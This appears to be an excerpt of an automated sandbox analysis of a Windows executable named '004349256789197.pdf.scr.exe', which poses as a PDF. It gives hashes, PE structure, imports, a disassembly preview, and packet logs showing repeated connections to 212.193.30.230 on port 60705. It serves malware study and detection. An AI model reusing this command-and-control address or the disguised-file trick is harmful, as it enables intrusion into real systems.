              Entropy (8bit):4.44831826838854
              Encrypted:false
              SSDEEP:
              MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
              SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
              SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
              SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
              Malicious:false
              Reputation:unknown
              Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.853911292117169
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:004349256789197.pdf.scr.exe
              File size:1181640
              MD5:3ac05bbe35293fbfd0df49ecfb34c461
              SHA1:ee12d93ac5f81036e920bb8c05638aa4e6c1f3bf
              SHA256:576263fb3c88934ebdb0aa6071f3a980710c9dfd2a3d63d09b0aa76f1caac9e7
              SHA512:21f616118075066eda343383aad8d6f2dd71bc33c9b8efec3eedc891414d96a0602449abddb96513d55da97ddedb987d612d8227dfd8f64ca85ed2051eb02e14
              SSDEEP:24576:9TbBv5rUeTM/TYaxVKPijgGjFwJ5gRn0Bz76hZYBA3pUd26P207:XBvsHB7jQ5Cnq7+ZEA3pEt+0
              TLSH:AD451202BBC695B3D5A3193256753B11BA3CB9601FA58ECFA7E00A5CDA315C0DB317B2
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

              File Icon

              Icon Hash:938c8c90b2ea6ab2

              Static PE Info

              General

              Entrypoint:0x41f530
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:12e12319f1029ec4f8fcbed7e82df162

              Entrypoint Preview

              Instruction
              call 00007F216C70BF2Bh
              jmp 00007F216C70B83Dh
              int3
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              push dword ptr [ebp+08h]
              mov esi, ecx
              call 00007F216C6FE687h
              mov dword ptr [esi], 004356D0h
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              and dword ptr [ecx+04h], 00000000h
              mov eax, ecx
              and dword ptr [ecx+08h], 00000000h
              mov dword ptr [ecx+04h], 004356D8h
              mov dword ptr [ecx], 004356D0h
              ret
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              push ebp
              mov ebp, esp
              push esi
              mov esi, ecx
              lea eax, dword ptr [esi+04h]
              mov dword ptr [esi], 004356B8h
              push eax
              call 00007F216C70ECCFh
              test byte ptr [ebp+08h], 00000001h
              pop ecx
              je 00007F216C70B9CCh
              push 0000000Ch
              push esi
              call 00007F216C70AF89h
              pop ecx
              pop ecx
              mov eax, esi
              pop esi
              pop ebp
              retn 0004h
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F216C6FE602h
              push 0043BEF0h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F216C70E789h
              int3
              push ebp
              mov ebp, esp
              sub esp, 0Ch
              lea ecx, dword ptr [ebp-0Ch]
              call 00007F216C70B948h
              push 0043C0F4h
              lea eax, dword ptr [ebp-0Ch]
              push eax
              call 00007F216C70E76Ch
              int3
              jmp 00007F216C710207h
              int3
              int3
              int3
              int3
              push 00422900h
              push dword ptr fs:[00000000h]

              Rich Headers

              Programming Language:
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x4a8c.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x690000x233c.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x31bdc0x31c00False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x330000xaec00xb000False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x3e0000x247200x1000False0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .didat0x630000x1900x200False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x640000x4a8c0x4c00False0.6105571546052632data6.391160230365552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x690000x233c0x2400False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              PNG0x645240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
              PNG0x6506c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
              RT_ICON0x666180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192
              RT_DIALOG0x667400x286dataEnglishUnited States
              RT_DIALOG0x669c80x13adataEnglishUnited States
              RT_DIALOG0x66b040xecdataEnglishUnited States
              RT_DIALOG0x66bf00x12edataEnglishUnited States
              RT_DIALOG0x66d200x338dataEnglishUnited States
              RT_DIALOG0x670580x252dataEnglishUnited States
              RT_STRING0x672ac0x1e2dataEnglishUnited States
              RT_STRING0x674900x1ccdataEnglishUnited States
              RT_STRING0x6765c0x1b8dataEnglishUnited States
              RT_STRING0x678140x146dataEnglishUnited States
              RT_STRING0x6795c0x46cdataEnglishUnited States
              RT_STRING0x67dc80x166dataEnglishUnited States
              RT_STRING0x67f300x152dataEnglishUnited States
              RT_STRING0x680840x10adataEnglishUnited States
              RT_STRING0x681900xbcdataEnglishUnited States
              RT_STRING0x6824c0xd6dataEnglishUnited States
              RT_GROUP_ICON0x683240x14data
              RT_MANIFEST0x683380x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
              OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
              gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Feb 3, 2023 17:52:09.616486073 CET4971460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:10.228163958 CET6070549714212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:10.918013096 CET4971460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:11.253858089 CET6070549714212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:11.918045998 CET4971460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:12.473380089 CET6070549714212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:16.750894070 CET4971760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:17.593020916 CET6070549717212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:18.106157064 CET4971760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:18.553436995 CET6070549717212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:19.215564966 CET4971760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:20.013190031 CET6070549717212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:25.434919119 CET4971960705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:25.738920927 CET6070549719212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:26.325540066 CET4971960705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:26.978645086 CET6070549719212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:27.521703959 CET4971960705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:28.055362940 CET6070549719212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:32.305283070 CET4972160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:32.739506006 CET6070549721212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:33.393497944 CET4972160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:33.869709015 CET6070549721212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:34.419946909 CET4972160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:34.984946966 CET6070549721212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:39.125330925 CET4972360705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:39.763123989 CET6070549723212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:40.264465094 CET4972360705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:41.218107939 CET6070549723212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:41.733109951 CET4972360705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:42.393220901 CET6070549723212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:46.811115026 CET4972460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:47.348661900 CET6070549724212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:48.015109062 CET4972460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:48.524660110 CET6070549724212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:49.124406099 CET4972460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:49.670073032 CET6070549724212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:53.803543091 CET4972660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:54.358467102 CET6070549726212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:54.921699047 CET4972660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:55.728024006 CET6070549726212.193.30.230192.168.2.7
              Feb 3, 2023 17:52:56.421844959 CET4972660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:52:56.953017950 CET6070549726212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:02.842880964 CET4972760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:03.413187027 CET6070549727212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:04.016222954 CET4972760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:04.482964993 CET6070549727212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:05.125746012 CET4972760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:05.448577881 CET6070549727212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:09.617194891 CET4972860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:10.073801041 CET6070549728212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:10.642218113 CET4972860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:11.048384905 CET6070549728212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:11.735630035 CET4972860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:12.313384056 CET6070549728212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:16.493644953 CET4973060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:16.968214989 CET6070549730212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:17.517337084 CET4973060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:18.348334074 CET6070549730212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:18.874224901 CET4973060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:19.189841986 CET6070549730212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:23.937660933 CET4973160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:24.764730930 CET6070549731212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:25.361829042 CET4973160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:25.743491888 CET6070549731212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:26.346234083 CET4973160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:26.543648958 CET6070549731212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:30.786456108 CET4973260705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:31.345398903 CET6070549732212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:31.846702099 CET4973260705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:32.373364925 CET6070549732212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:32.878211975 CET4973260705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:33.493311882 CET6070549732212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:40.529577017 CET4973460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:40.953541994 CET6070549734212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:41.644464970 CET4973460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:42.034797907 CET6070549734212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:42.535142899 CET4973460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:43.121236086 CET6070549734212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:47.350707054 CET4973560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:47.818212032 CET6070549735212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:48.332509041 CET4973560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:48.823368073 CET6070549735212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:49.332571030 CET4973560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:49.707901955 CET6070549735212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:53.955672979 CET4973660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:54.679156065 CET6070549736212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:55.192996025 CET4973660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:55.649688959 CET6070549736212.193.30.230192.168.2.7
              Feb 3, 2023 17:53:56.162882090 CET4973660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:53:56.823153973 CET6070549736212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:01.482918978 CET4973760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:01.823270082 CET6070549737212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:02.524898052 CET4973760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:02.957899094 CET6070549737212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:03.462488890 CET4973760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:04.038110971 CET6070549737212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:08.468101025 CET4973860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:08.993590117 CET6070549738212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:09.509828091 CET4973860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:09.914083004 CET6070549738212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:10.416254044 CET4973860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:11.179933071 CET6070549738212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:15.386823893 CET4974060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:15.754795074 CET6070549740212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:16.260425091 CET4974060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:17.478910923 CET6070549740212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:17.979327917 CET4974060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:18.508486032 CET6070549740212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:22.613198996 CET4974160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:23.309031963 CET6070549741212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:23.823534012 CET4974160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:24.285307884 CET6070549741212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:24.792359114 CET4974160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:25.340168953 CET6070549741212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:29.581478119 CET4974260705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:30.883723974 CET6070549742212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:31.386744976 CET4974260705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:31.630758047 CET6070549742212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:32.136724949 CET4974260705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:32.579580069 CET6070549742212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:36.839746952 CET4974360705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:37.233989954 CET6070549743212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:37.746849060 CET4974360705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:38.220102072 CET6070549743212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:38.731144905 CET4974360705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:39.328366995 CET6070549743212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:44.089864969 CET4974460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:44.598148108 CET6070549744212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:45.106678009 CET4974460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:45.674127102 CET6070549744212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:46.184860945 CET4974460705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:46.649853945 CET6070549744212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:50.937418938 CET4974560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:51.628546000 CET6070549745212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:52.138449907 CET4974560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:52.645000935 CET6070549745212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:53.154149055 CET4974560705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:53.673582077 CET6070549745212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:57.846054077 CET4974660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:58.843455076 CET6070549746212.193.30.230192.168.2.7
              Feb 3, 2023 17:54:59.404675007 CET4974660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:54:59.744728088 CET6070549746212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:00.404882908 CET4974660705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:01.027522087 CET6070549746212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:05.212343931 CET4974760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:05.549731970 CET6070549747212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:06.065211058 CET4974760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:06.568677902 CET6070549747212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:07.077233076 CET4974760705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:07.408595085 CET6070549747212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:13.897882938 CET4974860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:14.362968922 CET6070549748212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:14.890480995 CET4974860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:15.363099098 CET6070549748212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:15.890513897 CET4974860705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:16.364412069 CET6070549748212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:20.580554008 CET4975060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:21.153085947 CET6070549750212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:21.828564882 CET4975060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:22.027914047 CET6070549750212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:22.531708956 CET4975060705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:23.028040886 CET6070549750212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:27.289874077 CET4975160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:27.863548040 CET6070549751212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:28.375899076 CET4975160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:28.943737030 CET6070549751212.193.30.230192.168.2.7
              Feb 3, 2023 17:55:29.454125881 CET4975160705192.168.2.7212.193.30.230
              Feb 3, 2023 17:55:30.398902893 CET6070549751212.193.30.230192.168.2.7

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Feb 3, 2023 17:52:09.443150997 CET5083553192.168.2.78.8.8.8
              Feb 3, 2023 17:52:09.550913095 CET53508358.8.8.8192.168.2.7
              Feb 3, 2023 17:52:16.610014915 CET6392653192.168.2.78.8.8.8
              Feb 3, 2023 17:52:16.726582050 CET53639268.8.8.8192.168.2.7
              Feb 3, 2023 17:52:25.314857960 CET5100753192.168.2.78.8.8.8
              Feb 3, 2023 17:52:25.424727917 CET53510078.8.8.8192.168.2.7
              Feb 3, 2023 17:52:32.281383038 CET6076553192.168.2.78.8.8.8
              Feb 3, 2023 17:52:32.303405046 CET53607658.8.8.8192.168.2.7
              Feb 3, 2023 17:52:39.102504015 CET5002453192.168.2.78.8.8.8
              Feb 3, 2023 17:52:39.124073029 CET53500248.8.8.8192.168.2.7
              Feb 3, 2023 17:52:46.786912918 CET4951653192.168.2.78.8.8.8
              Feb 3, 2023 17:52:46.806299925 CET53495168.8.8.8192.168.2.7
              Feb 3, 2023 17:52:53.769855976 CET6139253192.168.2.78.8.8.8
              Feb 3, 2023 17:52:53.789580107 CET53613928.8.8.8192.168.2.7
              Feb 3, 2023 17:53:02.823585987 CET5210453192.168.2.78.8.8.8
              Feb 3, 2023 17:53:02.841408968 CET53521048.8.8.8192.168.2.7
              Feb 3, 2023 17:53:09.590004921 CET6535653192.168.2.78.8.8.8
              Feb 3, 2023 17:53:09.609643936 CET53653568.8.8.8192.168.2.7
              Feb 3, 2023 17:53:16.469430923 CET5152653192.168.2.78.8.8.8
              Feb 3, 2023 17:53:16.487303972 CET53515268.8.8.8192.168.2.7
              Feb 3, 2023 17:53:23.915457010 CET5113953192.168.2.78.8.8.8
              Feb 3, 2023 17:53:23.933341980 CET53511398.8.8.8192.168.2.7
              Feb 3, 2023 17:53:30.759666920 CET5878453192.168.2.78.8.8.8
              Feb 3, 2023 17:53:30.779515982 CET53587848.8.8.8192.168.2.7
              Feb 3, 2023 17:53:40.419250965 CET6460853192.168.2.78.8.8.8
              Feb 3, 2023 17:53:40.527806997 CET53646088.8.8.8192.168.2.7
              Feb 3, 2023 17:53:47.239336967 CET5874653192.168.2.78.8.8.8
              Feb 3, 2023 17:53:47.348970890 CET53587468.8.8.8192.168.2.7
              Feb 3, 2023 17:53:53.936758995 CET6243353192.168.2.78.8.8.8
              Feb 3, 2023 17:53:53.954144955 CET53624338.8.8.8192.168.2.7
              Feb 3, 2023 17:54:01.462042093 CET6124853192.168.2.78.8.8.8
              Feb 3, 2023 17:54:01.481538057 CET53612488.8.8.8192.168.2.7
              Feb 3, 2023 17:54:08.436933994 CET5275053192.168.2.78.8.8.8
              Feb 3, 2023 17:54:08.458302975 CET53527508.8.8.8192.168.2.7
              Feb 3, 2023 17:54:15.322606087 CET5023153192.168.2.78.8.8.8
              Feb 3, 2023 17:54:15.342376947 CET53502318.8.8.8192.168.2.7
              Feb 3, 2023 17:54:22.567852020 CET5851453192.168.2.78.8.8.8
              Feb 3, 2023 17:54:22.587543011 CET53585148.8.8.8192.168.2.7
              Feb 3, 2023 17:54:29.466197014 CET5143653192.168.2.78.8.8.8
              Feb 3, 2023 17:54:29.579541922 CET53514368.8.8.8192.168.2.7
              Feb 3, 2023 17:54:36.820679903 CET5905353192.168.2.78.8.8.8
              Feb 3, 2023 17:54:36.838251114 CET53590538.8.8.8192.168.2.7
              Feb 3, 2023 17:54:44.068591118 CET5194553192.168.2.78.8.8.8
              Feb 3, 2023 17:54:44.086455107 CET53519458.8.8.8192.168.2.7
              Feb 3, 2023 17:54:50.906075954 CET6318753192.168.2.78.8.8.8
              Feb 3, 2023 17:54:50.928325891 CET53631878.8.8.8192.168.2.7
              Feb 3, 2023 17:54:57.821435928 CET6476053192.168.2.78.8.8.8
              Feb 3, 2023 17:54:57.844635010 CET53647608.8.8.8192.168.2.7
              Feb 3, 2023 17:55:05.101567984 CET5363753192.168.2.78.8.8.8
